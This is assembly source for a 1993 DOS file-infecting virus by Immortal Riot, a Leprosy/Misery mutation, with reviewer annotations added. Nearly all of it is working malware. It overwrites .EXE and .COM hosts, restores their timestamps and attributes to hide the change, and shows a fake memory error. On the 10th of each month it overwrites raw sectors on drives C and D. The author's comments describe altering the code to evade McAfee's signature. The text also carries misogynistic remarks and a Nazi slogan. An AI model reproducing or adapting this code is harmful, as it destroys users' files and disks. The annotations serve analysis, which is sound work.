; VirusName: Raping Betrayals
; Country : Sweden
; Author : The Unforgiven / Immortal Riot
; Date : 15/09/1993
;
;
; This is a mutation of Misery from Immortal Riot.
; I mutated this one, cuz Mcafee scan grabbed it
; within one month after we released it. So, now
; "Misery" is called "Raping Betrayals". Many
; thanks to PCM2 for the original Leprosy virus.
;
; Okey..In this version I just changed the new
; Mcafee "Scan-String", by remarking some calls.
; I also added a day checker, and if the
; virus (or a infected file) is run at the 10:th
; any month, procedure "ellie" will go off..
; Ellie is some sort of heart breaker!..<..hehe..>
;
; It copies itself into other exe/com files on the current
; drive. The file-size will not be changed, cuz it just
; replaces the code in the beginning with itself. The
; infected files will not work, instead the virus will
; run again. The virus uses the dot-dot method for changing dirs.
;
; There has been many mutations born from Leprosy,
; and here we give you yet another contribution...
;
; McaFee Scan v108 can't find it, neither can S&S Toolkit 6.54
; Haven't tried with TBScan/F-prot, but they will probably
; identify it as "Leprosy".
;
; Regards : The Unforgiven / Immortal Riot
Title Raping Betrayals ; By The Unforgiven / Immortal Riot
; NOTE(review): the directives used here (Title, segment/assume, proc/endp,
; "dup (?)") are MASM/TASM syntax, not NASM as the page header labels it.
; Target is 16-bit real-mode DOS; org 100h below marks this as a .COM image.
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
; NOTE(review): virus_size is the byte count written over each host in
; infect_file (DOS INT 21h/40h), starting at code_start.
virus_size equ 664 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
; NOTE(review): the DTA offsets below match the DOS find-first/find-next
; (INT 21h/4Eh,4Fh) record layout: attribute at 21, time at 22, date at 24,
; ASCIIZ file name at 30. They are read in find_healthy and restored in
; close_file.
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
; ----------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
; ----------------------------------------------------------------------
main proc near ; Code execution begins here
; NOTE(review): analyst annotations follow; the instructions themselves are
; unchanged. Layout: a single-segment .COM image (org 100h) whose entry is
; "main". Control flow as written: main -> encrypt_decrypt ->
; random_mutation -> find_extension -> find_exe/find_com (INT 21h/4Eh,4Fh
; directory search) -> find_healthy -> healthy -> infect_file (INT 21h/40h
; overwrite of the head of the target with the first virus_size bytes of
; this image) -> daycheck -> exit_virus/terminate (INT 21h/4Ch). On day 10
; of any month daycheck diverts into ELLIE, a destructive INT 26h path.
; Host files keep their size, timestamp and attributes (see close_file), so
; detection has to rely on file content, not on metadata changes.
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
; NOTE(review): data byte sitting in the instruction stream; it is never
; executed because the jmp above skips over it. Its value changes between
; runs (see random_mutation), which is why find_healthy patches byte 6 of
; the read-back header before the self-comparison.
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code ----------
; NOTE(review): entered from healthy with the handle positioned at offset 0
; (close/reopen). Writes virus_size bytes starting at code_start over the
; head of the host, so the host's size is unchanged and its original code is
; destroyed (the header says so). Both encrypt_decrypt calls are commented
; out, so the push/pop around them is now a no-op and the bytes written are
; the plaintext in-memory image.
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
; call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov dx,code_start ; Buffer where code starts in memory
mov cx,virus_size ; Total number of bytes to write
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
; call encrypt_decrypt ; Restore the code as it was
call daycheck ; Call function who check's for day.
ret ; Go back to where you came from
; ---------- Encrypt or decrypt the virus code ----------
; NOTE(review): the byte is read into AH but the XOR is applied to AL, so
; the value stored back equals the value read; as written this loop leaves
; the image unchanged, and the on-disk copy is the same plaintext as the
; in-memory code. The loop bound is a signed compare (jle) and is inclusive
; of offset virus_code+virus_size.
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start
; encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor al,encrypt_val ; En/dis-engage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
; ----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
; ----------------------------------------------------------------------
virus_code:
; ----------------------------------------------------------------------
; "All strings are kept here in the file, and automatically encrypted"
; Okey..Thanks to Cybernetic Mutation Technology(tm), for this, but
; the virus is pretty un-use-less if Mcafee scan catch is so, I
; changed a few calls, and you can have phun with this again...
; ----------------------------------------------------------------------
; NOTE(review): search patterns for INT 21h/4Eh and the ".." path used by
; chdir to walk up the directory tree.
exe_filespec db "*.EXE",0 ; To infect EXE's
com_filespec db "*.COM",0 ; To infect COM's
newdir db "..",0 ; Move up one directory
; ----------------------------------------------------------------------
; Fake_msg is the message that will be printed on the screen, after
; it has infected files (or when a infected file is run).
; ----------------------------------------------------------------------
; NOTE(review): fake_msg is the user-visible symptom: a bogus DOS error
; printed after a host that does nothing else (see exit_virus/print_fake).
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"Betrayal is a sin, if it comes from another..$"
db " The Unforgiven / Immortal Riot " ; HUmm..that's me..
db " Dedicated to Ellie! - Lurve you! "; Love ya Ellie!
db " Sweden 15/09/93 " ; written..
; ----------------------------------------------------------------------
; Okey..these messages just are just "file-size out-fillers" or something,
; nothing important..so I remarked them, and the virus is a bit smaller...
; also check in prodedure "Exit_virus" for more info about m..
;virus_msg2 db cr,lf,tab," Something was placed here before.. $"
;virus_msg3 db cr,lf,tab," But now, it's all gone, black, sad $"
;virus_msg4 db cr,lf,tab," and empty. Empty places i my mind, $"
;virus_msg5 db cr,lf,tab," heart, life, and soul, yes, it's a sin. $"
; ----------------------------------------------------------------------
; NOTE(review): working storage. Because these variables sit inside the
; image that infect_file writes (presumably within the first virus_size
; bytes), their run-time values are copied into each host as well.
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
; NOTE(review): INT 21h/2Ch returns the time as CH:CL:DH:DL =
; hours:minutes:seconds:hundredths. DL (hundredths) becomes the new
; encrypt_val, but only on a first run (encrypt_val still 0) or when DH
; (seconds) is 15 or less (signed compare); a zero DL is retried.
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
; NOTE(review): files_infected is a memory byte (not BX, despite the
; comment). It starts at 4 and is decremented both by a successful
; infection (healthy) and by each step up a directory (chdir); the run ends
; when it reaches 0, so one run touches at most 4 files/levels.
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
; NOTE(review): CX = 27h attribute mask (read-only|hidden|system|archive),
; so hidden and system files are candidates too. "No more files" is
; detected by comparing AX with 12h rather than testing CF.
find_exe:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Try to find healthy .COM
; NOTE(review): INT 21h/3Bh with ".." walks one level towards the root;
; each step also burns one files_infected count.
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If "yes", find another
jmp exit_virus ; Otherwise let's pack it up
; NOTE(review): per-candidate routine. Saves the DTA entry's attribute,
; time and date so close_file can put them back, clears the attributes
; (INT 21h/43h, AL=1) so read-only/hidden/system files can be opened
; read/write (3Dh, AL=2), then reads the first 20 bytes. Self-recognition:
; that header is compared against this image at code_start with byte 6 of
; the buffer (where encrypt_val sits, presumably after the 3-byte call and
; 3-byte jmp) overwritten by the current encrypt_val. An already-infected
; file is closed and counted in files_found; anything else goes to healthy.
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribs
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Move the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
; NOTE(review): INT 21h/4Fh continues the search started by 4Eh in the
; same DTA; the loop re-enters find_healthy for each further match.
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; Try the process on this one
no_more_found:
ret ; Go back to where we came from
; NOTE(review): closes and reopens the file so the file pointer is back at
; offset 0 before infect_file overwrites the head of the host. The
; jz exit_virus below leaves through a called routine without returning
; (the stack is never unwound; terminate follows so nothing depends on it).
; The ret after the jmp is unreachable.
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
; NOTE(review): restores the original time/date (INT 21h/57h, AL=1) before
; closing and then the original attributes (43h, AL=1), so the host's
; metadata shows no sign of modification. The comments on the cx/dx lines
; are swapped: CX carries the time and DX the date, matching
; orig_time/orig_date.
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret ; Returning to base...
; ----------------------------------------------------------------------
; ELLIE:
; mov ah,09h ; Read under
; mov dx,offset virus_msg1 ; for more
; int 21h ; information
;
; Okey..If it's 10:th (any month), the virus will do something with
; your hard-drives (..ellie..) which I finds to be real nasty ! If
; you wanna check if the function day-check works, just un-mark
; the tree lines under the first "ellie". and the virus_msg1
; "Betrayal is a sin, if it comes from another" will be displayed.
; ----------------------------------------------------------------------
; Here is the real "Ellie"..Yeah..that's certainly her!
; ----------------------------------------------------------------------
; NOTE(review): destructive payload. INT 26h is the DOS absolute disk
; write (raw sectors, bypassing the file system); it is reached only from
; daycheck. Deliberately not annotated beyond this.
ELLIE: ; Here comes the bitch..
cli ; Tigh her up!
mov ah,2 ; starting with drive C
cwd ; starting at sector 0
mov cx,0100h ; write 256 sectors
int 026h ; to protect and serve..
jmp maria ; Next victim is Maria..
MARIA: ;Yet another..
MOV AL,3 ;Set to fry drive D
MOV CX,700 ;Set to write 700 sectors
MOV DX,00 ;Starting at sector 0
MOV DS,[DI+99] ;Put random crap in DS
MOV BX,[DI+55] ;More crap in BX
CALL ELLIE ;Jump for joy!...
; ----------------------------------------------------------------------
; If you want Ellie to go off on some special month, just look at procedure
; "Infect_file", and the call to daycheck. Change the call to Monthcheck,
; and "delete" the ";" on procedure monthcheck. But remember, that makes,
; the virus much less destructive, and by that time, all scanners has
; probably added a new scan-string on this one. Now it will go off the
; 10:th every month. Feel free to modify this as much you want to.
; MONTHCHECK: ; Procudure to check
; mov ah,2ah ; what month it is..
; int 21h ; Dos to your service..
; cmp dh,06 ; comp dh,06 (July, month 06)
; je daycheck ; if month 06, jump to daycheck,
; JMP something ; if not, just jump to something..
; ----------------------------------------------------------------------
; NOTE(review): trigger check, called from infect_file after every write.
; INT 21h/2Ah returns the date as CX=year, DH=month, DL=day; the payload
; branch is taken when the day of the month is 10, otherwise this returns.
Daycheck: ; check what day it is..
mov ah,2ah ;
int 21h ; Dos to your service..
cmp dl,10 ; If it is the 10:th,
je ellie ; if yes, have a great fuck..
JMP something ; if not..just can tell you how sorry I'm !
Something: ; Some stupid procedure..but remember..
ret ; Arbeit Macht Frei !
; NOTE(review): virus_msg1 is printed only when files_found >= 15 and
; success == 0 (both signed compares); every other run shows the fake
; "Program too big to fit in memory" error and exits via INT 21h/4Ch.
exit_virus:
cmp files_found,15 ; Are at least 15 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load address of the first line
int 21h ; Print it..
; mov dx,offset virus_msg2 ; ---
; int 21h ; Okey..mess(ages) 2-5 have been
; mov dx,offset virus_msg3 ; removed from the code..too bad,
; int 21h ; they were Metallica messages...
; mov dx,offset virus_msg4 ; ---
; int 21h ; Anyway, (ab)use this program, B4
; mov dx,offset virus_msg5 ; Mcafee gets a new string for this
; int 21h ; ---
jmp terminate ; Jump to terminate..
print_fake:
mov ah,09h ; Print fake error message
mov dx,offset fake_msg ; Print "fake_msg"
int 21h ; Dos to your service..
terminate: ; Get ready for quit this program
mov ah,4ch ; DOS terminate process function
int 21h ; Exit..
; NOTE(review): the comment says 666 bytes but virus_size equ 664; which
; figure is the intended image length cannot be told from this listing.
filler db 8 dup (90h) ; Pad out to 666 bytes
main endp
code ends
end main
; Greeting goes out to : Raver, Metal Militia, Scavenver,
; and of-cuz to Miss Perfect...ELLIE!